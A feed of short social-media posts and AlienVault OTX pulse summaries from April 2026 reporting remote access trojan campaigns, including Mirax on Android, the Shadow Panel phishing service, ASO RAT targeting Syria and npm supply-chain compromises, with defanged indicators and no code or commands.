Mirax RAT Exploits Meta Apps to Infiltrate Android Devices

Beware of fake ads on Meta apps - a sneaky new malware called Mirax RAT is using them to secretly take control of Android devices, with a focus on Spanish-speaking nations. This remote access Trojan is part of a growing Malware-as-a-Service economy that's putting unsuspecting users at risk.

https://osintsights.com/mirax-rat-exploits-meta-apps-to-infiltrate-android-devices?utm_source=mastodon&utm_medium=social

#MiraxRat #Malwareasaservice #MetaApps #AndroidMalware #RemoteAccessTrojan

Mirax RAT Exploits Meta Ads to Hijack 220,000 Devices

Meet Mirax RAT, a sneaky Android malware that's hijacked over 220,000 devices by exploiting Meta Ads, giving strangers full control over unsuspecting users' phones. This malicious code has rapidly spread to hundreds of thousands of social accounts, showcasing the alarming power of mainstream ad platforms in the wrong hands.

https://osintsights.com/mirax-rat-exploits-meta-ads-to-hijack-220000-devices?utm_source=mastodon&utm_medium=social

#MiraxRat #AndroidMalware #RemoteAccessTrojan #SocialEngineering #MetaAds

March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day

In March 2026, 31 high-impact vulnerabilities were identified requiring prioritization for remediation, with 29 receiving Very Critical Risk Scores. Affected vendors included Cisco, Microsoft, Google, ConnectWise, and others, with Microsoft and Apple accounting for approximately 32% of vulnerabilities. Notably, the Interlock Ransomware Group exploited CVE-2026-20131, a zero-day deserialization vulnerability in Cisco Secure Firewall Management Center, as early as January 2026 to compromise enterprise networks. The group deployed custom remote access trojans and facilitated ransomware operations through crafted HTTP requests executing arbitrary Java code as root. Additional campaigns involved the DarkSword iOS exploit kit delivering GHOSTKNIFE, GHOSTSABER, and GHOSTBLADE payloads, and the Coruna exploit kit deploying PlasmaLoader malware. Nine vulnerabilities enabled remote code execution across multiple platforms. One vulnerability dated back nine years, emphasizing continued exploitation of legacy unpatched

Pulse ID: 69de0077cbff2dc8d99b17ff
Pulse Link: https://otx.alienvault.com/pulse/69de0077cbff2dc8d99b17ff
Pulse Author: AlienVault
Created: 2026-04-14 08:53:11

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cisco #ConnectWise #CyberSecurity #Google #HTTP #InfoSec #Java #Malware #Microsoft #OTX #OpenThreatExchange #RAT #RansomWare #RemoteAccessTrojan #RemoteCodeExecution #Trojan #Vulnerability #Word #ZeroDay #bot #iOS #AlienVault

REFUNDEE: Inside a Shadow Panel Phishing-as-a-Service Operation

An open directory discovery at refundonex[.]com exposed a complete Phishing-as-a-Service and RAT-as-a-Service platform targeting Spanish and Portuguese-speaking victims. The investigation uncovered 3,788 files including weaponized LNK, VBS, and AES-encrypted PowerShell payloads delivering a remote access trojan. The platform, called Shadow Panel, operates from Bulgarian infrastructure and offers capabilities including remote shell execution, screenshot capture, file management, browser credential theft, clipboard hijacking for cryptocurrency wallets, and multi-operator support. The C2 panel's frontend JavaScript was publicly accessible, revealing 29 API endpoints and the complete architecture. Infrastructure analysis linked the operation to nikola4010@proton[.]me through WHOIS data and historical malicious domain associations dating back to 2021, indicating a long-running cybercriminal operation with minimal detection coverage.

Pulse ID: 69dd066f59e22e6d1ee7315b
Pulse Link: https://otx.alienvault.com/pulse/69dd066f59e22e6d1ee7315b
Pulse Author: AlienVault
Created: 2026-04-13 15:06:23

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Bulgaria #Clipboard #CyberSecurity #Endpoint #InfoSec #Java #JavaScript #LNK #Nim #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #RemoteAccessTrojan #Trojan #VBS #bot #cryptocurrency #AlienVault

Fake recruiter campaign targets crypto developers with RAT

A sophisticated fake recruitment campaign named 'graphalgo' has been active since May 2025, targeting JavaScript and Python developers in the cryptocurrency sector. Attackers approach victims through LinkedIn, Facebook, and Reddit with fabricated job opportunities from fake blockchain companies like Veltrix Capital. The campaign uses malicious dependencies hidden in npm and PyPI packages, delivered through coding test repositories on GitHub. Notable is the bigmathutils package that accumulated over 10,000 downloads before its malicious version was released. The operation deploys a remote access trojan (RAT) with token-protected C2 communication, file manipulation capabilities, and functionality to detect the Metamask browser extension, indicating focus on cryptocurrency theft. The modular campaign design allows threat actors to maintain backend infrastructure while easily replacing compromised frontend elements.

Pulse ID: 69dd073f50edefa3e44adec6
Pulse Link: https://otx.alienvault.com/pulse/69dd073f50edefa3e44adec6
Pulse Author: AlienVault
Created: 2026-04-13 15:09:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlockChain #Browser #CyberSecurity #Facebook #GitHub #InfoSec #Java #JavaScript #LinkedIn #NPM #OTX #OpenThreatExchange #PyPI #Python #RAT #RemoteAccessTrojan #Trojan #bot #cryptocurrency #developers #AlienVault

ASO RAT: Arabic-Language Android Surveillance Platform Targeting Syria

ASO RAT is a custom Android Remote Access Trojan featuring comprehensive device compromise capabilities including SMS interception, camera access, GPS tracking, call logging, file exfiltration, and DDoS functionality. Operating from Frankfurt-based infrastructure with connections to Syria, the platform disguises itself as PDF readers and Syrian government applications. Investigation revealed two active C2 servers, four DDNS domains, eight malicious APK samples with the newest achieving 0/66 antivirus detections, and complete reverse-engineered panel architecture exposing 21 API endpoints. The multi-user panel with role-based access control suggests RAT-as-a-Service operations. Infrastructure includes historical VPS providers and Starlink satellite connections geolocated to Syria. The developer's Arabic-language interface and Syria-themed lures indicate targeting of opposition figures, journalists, and military personnel within the Syrian conflict theater.

Pulse ID: 69dd062fb9ecc388e52457d3
Pulse Link: https://otx.alienvault.com/pulse/69dd062fb9ecc388e52457d3
Pulse Author: AlienVault
Created: 2026-04-13 15:05:19

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#APK #Android #Arabic #CyberSecurity #DDoS #DNS #DoS #ELF #Endpoint #Government #InfoSec #Military #OTX #OpenThreatExchange #PDF #RAT #RCE #RemoteAccessTrojan #SMS #Syria #Trojan #bot #AlienVault

A new Android RAT turning infected devices into potential residential proxy nodes

Mirax is a newly identified Android Remote Access Trojan operating as Malware-as-a-Service, actively targeting European users, particularly in Spanish-speaking regions. Distributed through Meta advertisements and GitHub-hosted droppers, the malware has reached over 200,000 accounts. It employs sophisticated techniques including dynamically fetched HTML overlays, comprehensive keylogging, and remote device control capabilities. A distinctive feature is its integration of SOCKS5-based residential proxy functionality, transforming infected devices into proxy nodes that enable attackers to route traffic through legitimate residential IP addresses. This capability allows operators to bypass geolocation restrictions and evade fraud detection systems while conducting account takeovers and transaction fraud. The malware uses commercial-grade obfuscation through Golden Encryption and establishes persistence through Accessibility Service abuse.

Pulse ID: 69dcfd5f0b3e3ab70a58831d
Pulse Link: https://otx.alienvault.com/pulse/69dcfd5f0b3e3ab70a58831d
Pulse Author: AlienVault
Created: 2026-04-13 14:27:43

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Android #CyberSecurity #Encryption #Europe #GitHub #HTML #InfoSec #Malware #MalwareAsAService #OTX #OpenThreatExchange #Proxy #RAT #RemoteAccessTrojan #Trojan #bot #AlienVault

NPM Package Supply Chain Compromise Leads to RAT Deployment

A supply chain attack targeting the Axios npm package has been identified after threat actors compromised the npm account of the company's lead developer. Malicious versions ([email protected] and [email protected]) were published containing a hidden dependency that executed postinstall scripts during npm installation. This automated execution downloaded and deployed a remote access trojan on affected systems without requiring user interaction, making it particularly dangerous for developer environments and CI/CD pipelines. The compromise resulted in full remote access capabilities, potential credential exposure including API keys and SSH keys, and possible insertion of malicious code into software builds. Detection platforms identified suspicious process execution chains involving npm spawning command interpreters and network utilities, followed by outbound connections to attacker-controlled infrastructure.

Pulse ID: 69d8b0c258b4fef5541358bb
Pulse Link: https://otx.alienvault.com/pulse/69d8b0c258b4fef5541358bb
Pulse Author: AlienVault
Created: 2026-04-10 08:11:46

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NPM #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SSH #SupplyChain #Trojan #Troll #bot #iOS #AlienVault

New Trojan STX RAT Targets Finance Sector with Sophisticated Stealth Methods

Meet STX RAT, a sneaky new remote access trojan that's got its sights set on the finance sector, using advanced stealth methods and command-and-control capabilities to evade detection. This latest threat is a wake-up call for defenders, testing their readiness to respond to increasingly sophisticated attacks.

https://osintsights.com/new-trojan-stx-rat-targets-finance-sector-with-sophisticated-stealth-methods?utm_source=mastodon&utm_medium=social

#RemoteAccessTrojan #StxRat #FinanceSector #EmergingThreats #AdvancedPersistentThreat

North Korea's Contagious Interview Campaign Spreads Across 5 Ecosystems, Delivering Staged RAT Payloads

A North Korean threat operation has published malicious packages across npm, PyPI, Go Modules, crates.io, and Packagist, impersonating legitimate developer tooling. The campaign uses GitHub aliases including golangorg and aokisasakidev to distribute staged malware loaders that contact actor-controlled infrastructure, retrieve payloads from Google Drive, and deliver platform-specific second-stage malware. The loaders are hidden behind normal-looking API functions in logging and utility libraries. Windows variants include full remote access trojans with capabilities for shell execution, keylogging, browser and wallet theft, sensitive file collection, and AnyDesk deployment. The operation demonstrates coordinated cross-ecosystem supply chain attacks with shared infrastructure patterns, reused extraction directories, and consistent staging logic across multiple programming languages.

Pulse ID: 69d61d25c472b8eb580c2996
Pulse Link: https://otx.alienvault.com/pulse/69d61d25c472b8eb580c2996
Pulse Author: AlienVault
Created: 2026-04-08 09:17:25

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AnyDesk #Browser #CyberSecurity #GitHub #Golang #Google #InfoSec #Korea #Malware #NPM #NorthKorea #OTX #OpenThreatExchange #PyPI #RAT #RemoteAccessTrojan #SupplyChain #Trojan #Troll #Windows #bot #AlienVault